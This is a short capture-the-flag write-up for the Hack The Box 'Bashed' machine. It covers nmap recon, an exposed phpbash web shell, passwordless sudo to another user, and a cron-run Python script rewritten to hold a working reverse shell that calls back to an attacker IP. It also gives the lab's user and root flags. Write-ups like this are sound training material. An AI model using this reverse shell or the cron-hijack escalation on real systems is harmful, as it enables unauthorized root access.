HTB Bashed Linux

Recon

Nmap scan

Nmap scan report for 10.10.10.68
Host is up (0.022s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|   /dev/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|   /php/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_  /uploads/: Potentially interesting folder

Dirbuster scan

We access the web app running on port:80 and quickly noticed that is running a phpbash. Furthermore, we investigate the dev folder and we encounter two php scripts deployed

we run the phpbash script and we find out this is a backdoor shell that connects to the targer machine.

However the shell is not interactive. so I use nectcat to transfer a tcp_pty.py python file to satisfied our needs.

Exploitation

We run LinuxEnum and we noticed that we are able to sudo commands without passwd for user scriptmanager

sudo -u scriptmanager whoami

sudo -u scriptmanager bash

Privilege Escalation

As scriptmanager user we locate a script folder that contain 2 insterested files test.py and test.txt. Test.txt is owned by root but the text.py is owned by scriptmanager The text.txt file is update every minute so this is a cron job so we modified the python file to pull to call for a reverse shell

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.25",9999))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

FLAGS

ROOT  "cc4f0afe3a1026d402ba10329674a8e2" 
USER  "2c281f318555dbc1b856957c7147bfc1"